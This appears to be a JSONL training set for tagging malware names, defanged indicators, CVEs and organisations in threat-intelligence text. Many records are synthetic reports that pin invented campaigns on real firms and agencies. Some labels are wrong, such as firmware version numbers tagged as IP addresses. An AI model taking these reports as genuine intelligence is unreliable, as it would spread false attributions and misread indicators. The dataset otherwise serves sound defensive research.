{"text": "Artifact Analysis for FormBook campaign:\nStage 1 dropper at C:\\Program Files\\Common Files\\ntds.dit - SHA256: 8f069676fa4eea6856dad09ee2f3325d7193d707b283879c9e9c8a8ec3b06bea\nStage 2 loader at C:\\Windows\\Tasks\\lsass.dmp - MD5: 50958d154cab1e2c13b8a657234227a8\nFinal payload at C:\\Windows\\System32\\config.dat - SHA256: fe2f57354fe041d1a2b3c3399338634a82521eb32adb3a6fc94ccca2fab0c753\nExfiltration module - MD5: 6e6913527d7e4334d2fd296de7e3eb15\nAll stages communicated with 100 [ . ] 37 [ . ] 252 [ . ] 78. Merlin signatures detected in Stage 2.", "spans": {"Malware: FormBook": [[22, 30]], "Indicator: 8f069676fa4eea6856dad09ee2f3325d7193d707b283879c9e9c8a8ec3b06bea": [[109, 173]], "Indicator: 50958d154cab1e2c13b8a657234227a8": [[226, 258]], "Indicator: fe2f57354fe041d1a2b3c3399338634a82521eb32adb3a6fc94ccca2fab0c753": [[317, 381]], "Indicator: 6e6913527d7e4334d2fd296de7e3eb15": [[409, 441]], "Indicator: 100.37.252.78": [[471, 502]]}, "info": {"id": "synth_v2_01948", "source": "defanged_augment"}}
{"text": "IOC Bulletin - IcedID Campaign:\nNetwork Indicators:\n- 172 [ . ] 124 [ . ] 249 [ . ] 99\n- 41[.]117[.]112[.]3\n- 192 [ . ] 183 [ . ] 123 [ . ] 154\n- loginportal[ . ]com\n- cloudsecure[.]cc\nURLs:\n- hxxps://backup-update[.]net/portal/verify\n- hxxps://backuprelay[ . ]tech/assets/js/payload.js\nEmail Senders:\n- verify@login-portal[.]tech\n- updates@credential-check[ . ]site\nFile Indicators:\n- SHA1: 54319f215964cedf6475e53b0a57f8279d07544e\n- MD5: b871a38cd83c9274c97d9fb44f071535\n- Drop path: C:\\Users\\admin\\AppData\\Local\\Temp\\backdoor.elf", "spans": {"Malware: IcedID": [[15, 21]], "Indicator: 172.124.249.99": [[54, 86]], "Indicator: 41.117.112.3": [[89, 107]], "Indicator: 192.183.123.154": [[110, 143]], "Indicator: loginportal.com": [[146, 165]], "Indicator: cloudsecure.cc": [[168, 184]], "Indicator: hxxps://backup-update.net/portal/verify": [[193, 234]], "Indicator: https://backuprelay.tech/assets/js/payload.js": [[237, 286]], "Indicator: verify@login-portal.tech": [[304, 330]], "Indicator: updates@credential-check.site": [[333, 366]], "Indicator: 54319f215964cedf6475e53b0a57f8279d07544e": [[392, 432]], "Indicator: b871a38cd83c9274c97d9fb44f071535": [[440, 472]]}, "info": {"id": "synth_v2_01492", "source": "defanged_augment"}}
{"text": "Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza[ . ]exe :", "spans": {"Indicator: Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza.exe": [[0, 60]]}, "info": {"id": "cyberner_stix_train_007829", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9900 Win.Spyware.Banker-4198 not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.heur Trojan.Winlock.5377 BehavesLike[ . ]Win32[ . ]Kespo[ . ]cc Troj.W32.Delf.l4mb not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.heur Trojan:Win32/Comine.A Trojan-Downloader.Win32.Banload", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Kespo.cc": [[163, 201]]}, "info": {"id": "cyner2_train_006313", "source": "defanged_augment"}}
{"text": "Additional digests with links to Chrysaor As a result of our investigation we have identified these additional Chrysaor-related apps . We believe APT40 's emphasis on maritime issues and naval technology ultimately support China 's ambition to establish a blue-water navy . Winnti : infestexe[.]com 2018-11-07 08:46:44 hxxps://www[.]facebook[.]com/infest.in.th . • Unauthorized network connections to MSSQL servers ( TCP/1433 ) and irregular or unauthorized authentication .", "spans": {"Malware: Chrysaor": [[33, 41]], "Malware: Chrysaor-related": [[111, 127]], "Organization: naval technology": [[187, 203]], "Indicator: infestexe.com": [[283, 298]], "Indicator: https://www.facebook.com/infest.in.th": [[319, 360]]}, "info": {"id": "cyberner_stix_train_002563", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Kaspersky GReAT identified a large-scale phishing operation. Emails originated from it@login-portal[ . ]tech and helpdesk@credential-check[.]site, spoofing legitimate services. Victims were directed to hxxp://portalstorage[ . ]dev/collect which hosted a credential harvesting page on cachegateway[.]org. A secondary link hxxp://gatewaysync[ . ]io/panel/index.html delivered REvil (SHA1: 31ebd72bfe664c2b4292d3e567df120b35f5bad1). The malware was saved to /home/user/.config/csrss.exe and established C2 with 10[.]157[.]208[.]161.", "spans": {"Organization: Kaspersky GReAT": [[26, 41]], "Indicator: it@login-portal.tech": [[110, 134]], "Indicator: helpdesk@credential-check.site": [[139, 171]], "Indicator: http://portalstorage.dev/collect": [[228, 264]], "Indicator: cachegateway.org": [[310, 328]], "Indicator: http://gatewaysync.io/panel/index.html": [[347, 389]], "Malware: REvil": [[400, 405]], "Indicator: 31ebd72bfe664c2b4292d3e567df120b35f5bad1": [[413, 453]], "Indicator: 10.157.208.161": [[534, 554]]}, "info": {"id": "synth_v2_01076", "source": "defanged_augment"}}
{"text": "The downloaded file is an archive file ( [ . ]r23 ) , that contains a Windows executable file with the same name as the PDF and with a fake Microsoft Word icon .", "spans": {"Indicator: .r23": [[41, 49]], "System: Windows": [[70, 77]], "Organization: Microsoft": [[140, 149]]}, "info": {"id": "cyberner_stix_train_005308", "source": "defanged_augment"}}
{"text": "This exploration required a look at the suspect cmd[ . ]exe 's parent process , shown earlier in the investigation to be ACLIENT[ . ]EXE .", "spans": {"Indicator: cmd.exe": [[48, 59]], "Indicator: ACLIENT.EXE": [[121, 136]]}, "info": {"id": "cyberner_stix_train_003914", "source": "defanged_augment"}}
{"text": "Blog Post by Cisco Talos: Tracking Aqua Blizzard's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-24328 against Microsoft Exchange deployments. The initial access vector involves spear-phishing emails from finance@auth-check[ . ]org delivering Conti. Post-compromise, the attackers deploy Hive and use Nmap for reconnaissance. C2 infrastructure includes 127[.]39[.]238[.]3 and proxy-cache[.]top. A staging server at hxxp://update-gateway[.]net/login hosts additional tooling. Key artifact: C:\\Windows\\System32\\update.dll (SHA256: 2787c9cc2a0e8a5bd5d753c78b4033124deec11e928c4fa6236d7e4f44e95bda).", "spans": {"Organization: Cisco Talos": [[13, 24]], "Vulnerability: CVE-2020-24328": [[128, 142]], "System: Microsoft Exchange": [[151, 169]], "Indicator: finance@auth-check.org": [[245, 271]], "Malware: Conti": [[283, 288]], "Malware: Hive": [[328, 332]], "Indicator: 127.39.238.3": [[393, 411]], "Indicator: proxy-cache.top": [[416, 433]], "Indicator: hxxp://update-gateway.net/login": [[455, 488]], "Indicator: 2787c9cc2a0e8a5bd5d753c78b4033124deec11e928c4fa6236d7e4f44e95bda": [[569, 633]]}, "info": {"id": "synth_v2_01604", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 172[.]242[.]119[.]16, the Sophos X-Ops IR team identified Qbot running as /tmp/dropper.ps1. The threat actor, believed to be OilRig, used PsExec for credential harvesting and Impacket for lateral movement. Exfiltrated data was sent to logincdn[ . ]tech and updatesync[.]club. The initial dropper (MD5: bb48b05edaab3f4f81210cdac4f1df39) was delivered via a phishing email from helpdesk@auth-check[ . ]org. A second C2 node was observed at 65 [ . ] 210 [ . ] 159 [ . ] 190, with a persistence mechanism writing to /dev/shm/dropper.ps1.", "spans": {"Indicator: 172.242.119.16": [[64, 84]], "Organization: Sophos X-Ops": [[90, 102]], "Malware: Qbot": [[122, 126]], "Indicator: logincdn.tech": [[299, 316]], "Indicator: updatesync.club": [[321, 338]], "Indicator: bb48b05edaab3f4f81210cdac4f1df39": [[366, 398]], "Indicator: helpdesk@auth-check.org": [[440, 467]], "Indicator: 65.210.159.190": [[502, 534]]}, "info": {"id": "synth_v2_00439", "source": "defanged_augment"}}
{"text": "Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects EX6200v2 before 1 [ . ] 0 [ . ] 1 [ . ] 86, EX6250 before 1 [ . ] 0 [ . ] 0 [ . ] 134, EX7700 before 1[.]0[.]0[.]216, EX8000 before 1 [ . ] 0 [ . ] 1 [ . ] 232, LBR1020 before 2[.]6[.]3[.]58, LBR20 before 2[.]6[.]3[.]50, R7800 before 1[.]0[.]2[.]80, R8900 before 1[.]0[.]5[.]26, R9000 before 1[.]0[.]5[.]26, RBS50Y before 2[.]7[.]3[.]22, WNR2000v5 before 1 [ . ] 0 [ . ] 0 [ . ] 76, XR700 before 1 [ . ] 0 [ . ] 1 [ . ] 36, EX6150v2 before 1[.]0[.]1[.]98, EX7300 before 1 [ . ] 0 [ . ] 2 [ . ] 158, EX7320 before 1[.]0[.]0[.]134, RAX10 before 1[.]0[.]2[.]88, RAX120 before 1[.]2[.]0[.]16, RAX70 before 1[.]0[.]2[.]88, EX6100v2 before 1[.]0[.]1[.]98, EX6400 before 1 [ . ] 0 [ . ] 2 [ . ] 158, EX7300v2 before 1[.]0[.]0[.]134, R6700AX before 1 [ . ] 0 [ . ] 2 [ . ] 88, RAX120v2 before 1 [ . ] 2 [ . ] 0 [ . ] 16, RAX78 before 1 [ . ] 0 [ . ] 2 [ . ] 88, EX6410 before 1 [ . ] 0 [ . ] 0 [ . ] 134, RBR10 before 2 [ . ] 7 [ . ] 3 [ . ] 22, RBR20 before 2 [ . ] 7 [ . ] 3 [ . ] 22, RBR350 before 4[.]3[.]4[.]7, RBR40 before 2 [ . ] 7 [ . ] 3 [ . ] 22, RBR50 before 2[.]7[.]3[.]22, EX6420 before 1[.]0[.]0[.]134, RBS10 before 2[.]7[.]3[.]22, RBS20 before 2 [ . ] 7 [ . ] 3 [ . ] 22, RBS350 before 4 [ . ] 3 [ . ] 4 [ . ] 7, RBS40 before 2[.]7[.]3[.]22, RBS50 before 2 [ . ] 7 [ . ] 3 [ . ] 22, EX6400v2 before 1[.]0[.]0[.]134, RBK12 before 2[.]7[.]3[.]22, RBK20 before 2 [ . ] 7 [ . ] 3 [ . ] 22, RBK352 before 4 [ . ] 3 [ . ] 4 [ . ] 7, RBK40 before 2[.]7[.]3[.]22, and RBK50 before 2[.]7[.]3[.]22.", "spans": {"Indicator: 1.0.1.86": [[119, 145]], "Indicator: 1.0.0.134": [[161, 188], [616, 631], [812, 827], [971, 998], [1195, 1210], [1409, 1424]], "Indicator: 1.0.0.216": [[204, 219]], "Indicator: 1.0.1.232": [[235, 262]], "Indicator: 2.6.3.58": [[279, 293]], "Indicator: 2.6.3.50": [[308, 322]], "Indicator: 1.0.2.80": [[337, 351]], "Indicator: 1.0.5.26": [[366, 380], [395, 409]], "Indicator: 2.7.3.22": [[425, 439], [1013, 1039], [1054, 1080], [1124, 1150], [1165, 1179], [1225, 1239], [1254, 1280], [1336, 1350], [1365, 1391], [1439, 1453], [1468, 1494], [1550, 1564], [1583, 1597]], "Indicator: 1.0.0.76": [[458, 484]], "Indicator: 1.0.1.36": [[499, 525]], "Indicator: 1.0.1.98": [[543, 557], [737, 751]], "Indicator: 1.0.2.158": [[573, 600], [767, 794]], "Indicator: 1.0.2.88": [[646, 660], [705, 719], [844, 870], [929, 955]], "Indicator: 1.2.0.16": [[676, 690], [888, 914]], "Indicator: 4.3.4.7": [[1096, 1109], [1296, 1321], [1510, 1535]], "Vulnerability: command injection": [[40, 57]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-45619"}}
{"text": "PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach . The attackers behind observed activity in 2018 operate from the Xicheng District of Beijing via the net block 221[.]216[.]0[.]0/13 .", "spans": {"Vulnerability: Flash vulnerability": [[108, 127]], "Vulnerability: CVE-2015-5119": [[130, 143]], "Indicator: 221.216.0.0": [[305, 322]]}, "info": {"id": "cyberner_stix_train_005956", "source": "defanged_augment"}}
{"text": "In this latest incident , the group registered a fake news domain , timesofindiaa[ . ]in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability .", "spans": {"Organization: government officials": [[167, 187]], "Vulnerability: CVE-2017-0261": [[255, 268]], "Vulnerability: CVE-2015-2545": [[402, 415]], "Indicator: timesofindiaa.in": [[68, 88]]}, "info": {"id": "cyberner_stix_train_003536", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Dragos identified a large-scale phishing operation. Emails originated from finance@account-update[ . ]xyz and account@document-share[.]link, spoofing legitimate services. Victims were directed to hxxps://portalupdate[.]club/admin/config which hosted a credential harvesting page on relay-cdn[.]info. A secondary link hxxp://updatebackup[ . ]cc/download/update.exe delivered Latrodectus (SHA1: 36d70e9797459ebf70fc608d9d1f66c1dae796fc). The malware was saved to C:\\ProgramData\\dropper.ps1 and established C2 with 175[.]226[.]15[.]105.", "spans": {"Organization: Dragos": [[26, 32]], "Indicator: finance@account-update.xyz": [[101, 131]], "Indicator: account@document-share.link": [[136, 165]], "Indicator: https://portalupdate.club/admin/config": [[222, 262]], "Indicator: relay-cdn.info": [[308, 324]], "Indicator: hxxp://updatebackup.cc/download/update.exe": [[343, 389]], "Malware: Latrodectus": [[400, 411]], "Indicator: 36d70e9797459ebf70fc608d9d1f66c1dae796fc": [[419, 459]], "Indicator: 175.226.15.105": [[538, 558]]}, "info": {"id": "synth_v2_00967", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Amadey (MD5: 97dda2ca028226f26ec9443f732caa96). Upon execution on Windows 11, the sample creates C:\\Program Files\\Common Files\\csrss.exe and injects into legitimate processes. Network analysis shows beaconing to 10[.]198[.]36[.]38 every 60 seconds and DNS queries to node-login[ . ]live. The second stage was fetched from hxxp://proxy-node[ . ]net/wp-content/uploads/doc.php and written to /var/tmp/backdoor.elf. The payload uses Sliver-style techniques for defense evasion. A secondary hash (SHA256: fd600b8a4da758a12bc2a66fac8b3b62bd3c739d2f7ee709796e0e294146f912) was extracted from the unpacked payload.", "spans": {"Malware: Amadey": [[25, 31]], "Indicator: 97dda2ca028226f26ec9443f732caa96": [[38, 70]], "System: Windows 11": [[91, 101]], "Indicator: 10.198.36.38": [[237, 255]], "Indicator: node-login.live": [[292, 311]], "Indicator: hxxp://proxy-node.net/wp-content/uploads/doc.php": [[347, 399]], "Indicator: fd600b8a4da758a12bc2a66fac8b3b62bd3c739d2f7ee709796e0e294146f912": [[526, 590]]}, "info": {"id": "synth_v2_00583", "source": "defanged_augment"}}
{"text": "Feodo Tracker reports that Emotet command-and-control server at 162 [ . ] 243 [ . ] 103 [ . ] 246:8080 has been active since June 2022. The Emotet banking trojan continues to evolve, with recent campaigns delivering payloads via malicious email attachments. Additional QakBot C2 infrastructure was identified at 50 [ . ] 16 [ . ] 16 [ . ] 211:443 and 34[.]204[.]119[.]63:443.", "spans": {"Indicator: 162.243.103.246": [[64, 97]], "Indicator: 50.16.16.211": [[312, 342]], "Indicator: 34.204.119.63": [[351, 370]], "Malware: Emotet": [[27, 33], [140, 146]], "Malware: QakBot": [[269, 275]]}, "info": {"id": "otx_00002", "source": "defanged_augment"}}
{"text": "Check Point Research published a threat intelligence report linking Turla to a new campaign exploiting CVE-2024-42717 in Apache Struts. The attackers deployed Cobalt Strike via BloodHound, establishing C2 communication with 172[.]128[.]171[.]158 and secure-update[.]online. A secondary payload was downloaded from hxxp://api-data[ . ]club/collect. The malware binary (SHA1: 9ae665d971cdbb6cc5285479f6d8d48e02c5f0a3) was dropped to /opt/app/bin/ntds.dit. Phishing emails were sent from billing@auth-check[ . ]org targeting enterprise users. A backup C2 server was identified at 12 [ . ] 53 [ . ] 26 [ . ] 237.", "spans": {"Organization: Check Point Research": [[0, 20]], "Vulnerability: CVE-2024-42717": [[103, 117]], "System: Apache Struts": [[121, 134]], "Malware: Cobalt Strike": [[159, 172]], "Indicator: 172.128.171.158": [[224, 245]], "Indicator: secure-update.online": [[250, 272]], "Indicator: http://api-data.club/collect": [[314, 346]], "Indicator: 9ae665d971cdbb6cc5285479f6d8d48e02c5f0a3": [[374, 414]], "Indicator: billing@auth-check.org": [[485, 511]], "Indicator: 12.53.26.237": [[577, 607]]}, "info": {"id": "synth_v2_00227", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed BITSAdmin artifacts at C:\\Users\\admin\\Desktop\\dropper.ps1. Memory dump analysis confirmed execution of ADFind. Registry modifications pointed to persistence via C:\\Users\\admin\\AppData\\Local\\Temp\\agent.py. Network forensics identified connections to 10[.]115[.]82[.]100 and relaybackup[ . ]net. Email headers traced the initial vector to info@identity-verify[.]cc. File C:\\Users\\Public\\Documents\\loader.exe (MD5: fb1997cdf75f005338ba055108262574) was identified as the initial dropper. A staging URL hxxps://storage-data[.]cc/callback resolved to 168[.]168[.]205[.]66. Secondary artifact hash: SHA1: 5688978ac750cc96f89feedf187a3f54534fda66.", "spans": {"Indicator: 10.115.82.100": [[321, 340]], "Indicator: relaybackup.net": [[345, 364]], "Indicator: info@identity-verify.cc": [[409, 434]], "Indicator: fb1997cdf75f005338ba055108262574": [[484, 516]], "Indicator: hxxps://storage-data.cc/callback": [[571, 605]], "Indicator: 168.168.205.66": [[618, 638]], "Indicator: 5688978ac750cc96f89feedf187a3f54534fda66": [[671, 711]]}, "info": {"id": "synth_v2_01187", "source": "defanged_augment"}}
{"text": "Blog Post by Europol: Tracking Lazarus Group's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-33526 against Citrix NetScaler deployments. The initial access vector involves spear-phishing emails from info@auth-check[.]org delivering Amadey. Post-compromise, the attackers deploy Latrodectus and use Sharphound for reconnaissance. C2 infrastructure includes 10 [ . ] 63 [ . ] 11 [ . ] 202 and auth-sync[ . ]org. A staging server at hxxp://gatewaystatic[.]com/download/update.exe hosts additional tooling. Key artifact: /dev/shm/winlogon.exe (MD5: 946c0c961fe129f536e958f3e3bca12e).", "spans": {"Organization: Europol": [[13, 20]], "Vulnerability: CVE-2021-33526": [[124, 138]], "System: Citrix NetScaler": [[147, 163]], "Indicator: info@auth-check.org": [[239, 260]], "Malware: Amadey": [[272, 278]], "Malware: Latrodectus": [[318, 329]], "Indicator: 10.63.11.202": [[396, 426]], "Indicator: auth-sync.org": [[431, 448]], "Indicator: http://gatewaystatic.com/download/update.exe": [[470, 516]], "Indicator: 946c0c961fe129f536e958f3e3bca12e": [[585, 617]]}, "info": {"id": "synth_v2_01522", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Check Point Research identified a large-scale phishing operation. Emails originated from helpdesk@login-portal[.]tech and account@account-update[ . ]xyz, spoofing legitimate services. Victims were directed to hxxps://login-login[.]info/login which hosted a credential harvesting page on cdn-mail[ . ]site. A secondary link hxxp://datacache[.]org/admin/config delivered BlackCat (SHA256: 5fea0499e94cdcafd3ca229afda628f5eb42f515a3ce70caf95e816442ab66c6). The malware was saved to C:\\Users\\Public\\Documents\\implant.so and established C2 with 10[.]58[.]106[.]66.", "spans": {"Organization: Check Point Research": [[26, 46]], "Indicator: helpdesk@login-portal.tech": [[115, 143]], "Indicator: account@account-update.xyz": [[148, 178]], "Indicator: hxxps://login-login.info/login": [[235, 267]], "Indicator: cdn-mail.site": [[313, 330]], "Indicator: hxxp://datacache.org/admin/config": [[349, 384]], "Malware: BlackCat": [[395, 403]], "Indicator: 5fea0499e94cdcafd3ca229afda628f5eb42f515a3ce70caf95e816442ab66c6": [[413, 477]], "Indicator: 10.58.106.66": [[566, 584]]}, "info": {"id": "synth_v2_01040", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngtp: Fix use-after-free in __gtp_encap_destroy().\n\nsyzkaller reported use-after-free in __gtp_encap_destroy(). [0]\n\nIt shows the same process freed sk and touched it illegally.\n\nCommit e198987e7dd7 (\"gtp: fix suspicious RCU usage\") added lock_sock()\nand release_sock() in __gtp_encap_destroy() to protect sk->sk_user_data,\nbut release_sock() is called after sock_put() releases the last refcnt.\n\n[0]:\nBUG: KASAN: slab-use-after-free in instrument_atomic_read_write include/linux/instrumented.h:96 [inline]\nBUG: KASAN: slab-use-after-free in atomic_try_cmpxchg_acquire include/linux/atomic/atomic-instrumented.h:541 [inline]\nBUG: KASAN: slab-use-after-free in queued_spin_lock include/asm-generic/qspinlock.h:111 [inline]\nBUG: KASAN: slab-use-after-free in do_raw_spin_lock include/linux/spinlock.h:186 [inline]\nBUG: KASAN: slab-use-after-free in __raw_spin_lock_bh include/linux/spinlock_api_smp.h:127 [inline]\nBUG: KASAN: slab-use-after-free in _raw_spin_lock_bh+0x75/0xe0 kernel/locking/spinlock.c:178\nWrite of size 4 at addr ffff88800dbef398 by task syz-executor.2/2401\n\nCPU: 1 PID: 2401 Comm: syz-executor.2 Not tainted 6.4.0-rc5-01219-gfa0e21fa4443 #2\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1[.]16[.]0-0-gd239552ce722-prebuilt[.]qemu[.]org 04/01/2014\nCall Trace:\n <TASK>\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x72/0xa0 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:351 [inline]\n print_report+0xcc/0x620 mm/kasan/report.c:462\n kasan_report+0xb2/0xe0 mm/kasan/report.c:572\n check_region_inline mm/kasan/generic.c:181 [inline]\n kasan_check_range+0x39/0x1c0 mm/kasan/generic.c:187\n instrument_atomic_read_write include/linux/instrumented.h:96 [inline]\n atomic_try_cmpxchg_acquire include/linux/atomic/atomic-instrumented.h:541 [inline]\n queued_spin_lock include/asm-generic/qspinlock.h:111 [inline]\n do_raw_spin_lock include/linux/spinlock.h:186 [inline]\n __raw_spin_lock_bh include/linux/spinlock_api_smp.h:127 [inline]\n _raw_spin_lock_bh+0x75/0xe0 kernel/locking/spinlock.c:178\n spin_lock_bh include/linux/spinlock.h:355 [inline]\n release_sock+0x1f/0x1a0 net/core/sock.c:3526\n gtp_encap_disable_sock drivers/net/gtp.c:651 [inline]\n gtp_encap_disable+0xb9/0x220 drivers/net/gtp.c:664\n gtp_dev_uninit+0x19/0x50 drivers/net/gtp.c:728\n unregister_netdevice_many_notify+0x97e/0x1520 net/core/dev.c:10841\n rtnl_delete_link net/core/rtnetlink.c:3216 [inline]\n rtnl_dellink+0x3c0/0xb30 net/core/rtnetlink.c:3268\n rtnetlink_rcv_msg+0x450/0xb10 net/core/rtnetlink.c:6423\n netlink_rcv_skb+0x15d/0x450 net/netlink/af_netlink.c:2548\n netlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline]\n netlink_unicast+0x700/0x930 net/netlink/af_netlink.c:1365\n netlink_sendmsg+0x91c/0xe30 net/netlink/af_netlink.c:1913\n sock_sendmsg_nosec net/socket.c:724 [inline]\n sock_sendmsg+0x1b7/0x200 net/socket.c:747\n ____sys_sendmsg+0x75a/0x990 net/socket.c:2493\n ___sys_sendmsg+0x11d/0x1c0 net/socket.c:2547\n __sys_sendmsg+0xfe/0x1d0 net/socket.c:2576\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3f/0x90 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\nRIP: 0033:0x7f1168b1fe5d\nCode: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 73 9f 1b 00 f7 d8 64 89 01 48\nRSP: 002b:00007f1167edccc8 EFLAGS: 00000246 ORIG_RAX: 000000000000002e\nRAX: ffffffffffffffda RBX: 00000000004bbf80 RCX: 00007f1168b1fe5d\nRDX: 0000000000000000 RSI: 00000000200002c0 RDI: 0000000000000003\nRBP: 00000000004bbf80 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\nR13: 000000000000000b R14: 00007f1168b80530 R15: 0000000000000000\n </TASK>\n\nAllocated by task 1483:\n kasan_save_stack+0x22/0x50 mm/kasan/common.c:45\n kasan_set_track+0x25/0x30 mm/kasan/common.c:52\n __kasan_slab_alloc+0x\n---truncated---", "spans": {"Indicator: rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org": [[1286, 1338]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[1241, 1245]], "Vulnerability: use-after-free": [[78, 92], [139, 153], [487, 501], [592, 606], [710, 724], [807, 821], [897, 911], [997, 1011]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-54142"}}
{"text": "Rapid7 published a threat intelligence report linking TA505 to a new campaign exploiting CVE-2022-47837 in Juniper SRX. The attackers deployed NjRAT via Brute Ratel, establishing C2 communication with 90 [ . ] 243 [ . ] 49 [ . ] 113 and update-storage[.]top. A secondary payload was downloaded from hxxp://secure-data[ . ]io/panel/index.html. The malware binary (SHA256: c0eb0ab288ed0b91d51b08d0ab7474e899c0356942496d6f28ce73ef91841b55) was dropped to /opt/app/bin/dropper.ps1. Phishing emails were sent from contact@credential-check[.]site targeting enterprise users. A backup C2 server was identified at 82[.]34[.]153[.]12.", "spans": {"Organization: Rapid7": [[0, 6]], "Vulnerability: CVE-2022-47837": [[89, 103]], "System: Juniper SRX": [[107, 118]], "Malware: NjRAT": [[143, 148]], "Indicator: 90.243.49.113": [[201, 232]], "Indicator: update-storage.top": [[237, 257]], "Indicator: hxxp://secure-data.io/panel/index.html": [[299, 341]], "Indicator: c0eb0ab288ed0b91d51b08d0ab7474e899c0356942496d6f28ce73ef91841b55": [[371, 435]], "Indicator: contact@credential-check.site": [[509, 540]], "Indicator: 82.34.153.12": [[606, 624]]}, "info": {"id": "synth_v2_00092", "source": "defanged_augment"}}
{"text": "By looking at our telemetry , we found evidence that Turla installers were exfiltrating information to get[.]adobe[.]com URLs since at least July 2016 .", "spans": {"Indicator: get.adobe.com": [[103, 120]]}, "info": {"id": "dnrti_train_001547", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Qbot (MD5: 9c1d255c01f646fd037d6a8fda3fbc85). Upon execution on Palo Alto PAN-OS, the sample creates /opt/app/bin/loader.exe and injects into legitimate processes. Network analysis shows beaconing to 90 [ . ] 230 [ . ] 87 [ . ] 10 every 60 seconds and DNS queries to loginedge[.]cc. The second stage was fetched from hxxps://gateway-mail[ . ]top/wp-content/uploads/doc.php and written to /usr/local/bin/chrome_helper.exe. The payload uses LaZagne-style techniques for defense evasion. A secondary hash (SHA1: 0c6ca766102f724226e263d9f164c973f433501c) was extracted from the unpacked payload.", "spans": {"Malware: Qbot": [[25, 29]], "Indicator: 9c1d255c01f646fd037d6a8fda3fbc85": [[36, 68]], "System: Palo Alto PAN-OS": [[89, 105]], "Indicator: 90.230.87.10": [[225, 255]], "Indicator: loginedge.cc": [[292, 306]], "Indicator: https://gateway-mail.top/wp-content/uploads/doc.php": [[342, 397]], "Indicator: 0c6ca766102f724226e263d9f164c973f433501c": [[534, 574]]}, "info": {"id": "synth_v2_00451", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2025-19065 is a critical buffer overflow affecting Active Directory. CISA confirmed active exploitation by Turla in the wild. Exploitation delivers AgentTesla (MD5: 755cc0110a8ece9109ef36a5a0a1cfdb) which is dropped to /var/tmp/ntds.dit. The exploit payload is hosted at hxxp://edge-storage[.]net/download/update.exe and communicates to 39[.]33[.]227[.]3 for C2.", "spans": {"Vulnerability: CVE-2025-19065": [[24, 38]], "Vulnerability: buffer overflow": [[53, 68]], "System: Active Directory": [[79, 95]], "Organization: CISA": [[97, 101]], "Malware: AgentTesla": [[176, 186]], "Indicator: 755cc0110a8ece9109ef36a5a0a1cfdb": [[193, 225]], "Indicator: http://edge-storage.net/download/update.exe": [[299, 344]], "Indicator: 39.33.227.3": [[365, 382]]}, "info": {"id": "synth_v2_00743", "source": "defanged_augment"}}
{"text": "Cisco Talos detected a multi-stage attack chain. The initial phishing email from noreply@phishing-domain[ . ]com contained a link to hxxp://mail-cache[.]info/callback. This redirected to hxxps://cache-update[.]dev/callback on mailcloud[.]top. A secondary email from admin@document-share[ . ]link pointed to hxxp://auth-api[.]tech/assets/js/payload.js which delivered NjRAT. The final payload callback was hxxps://updatestatic[ . ]site/wp-content/uploads/doc.php resolving to 9 [ . ] 59 [ . ] 190 [ . ] 51 via staticproxy[ . ]xyz.", "spans": {"Organization: Cisco Talos": [[0, 11]], "Indicator: noreply@phishing-domain.com": [[81, 112]], "Indicator: hxxp://mail-cache.info/callback": [[133, 166]], "Indicator: hxxps://cache-update.dev/callback": [[187, 222]], "Indicator: mailcloud.top": [[226, 241]], "Indicator: admin@document-share.link": [[266, 295]], "Indicator: hxxp://auth-api.tech/assets/js/payload.js": [[307, 350]], "Malware: NjRAT": [[367, 372]], "Indicator: https://updatestatic.site/wp-content/uploads/doc.php": [[405, 461]], "Indicator: 9.59.190.51": [[475, 504]], "Indicator: staticproxy.xyz": [[509, 528]]}, "info": {"id": "synth_v2_01821", "source": "defanged_augment"}}
{"text": "This Windows malware loads the encrypted msctfp[.]dat file in a system folder , and loads each configuration value .", "spans": {"System: Windows": [[5, 12]], "Indicator: msctfp.dat": [[41, 53]]}, "info": {"id": "cyberner_stix_train_003748", "source": "defanged_augment"}}
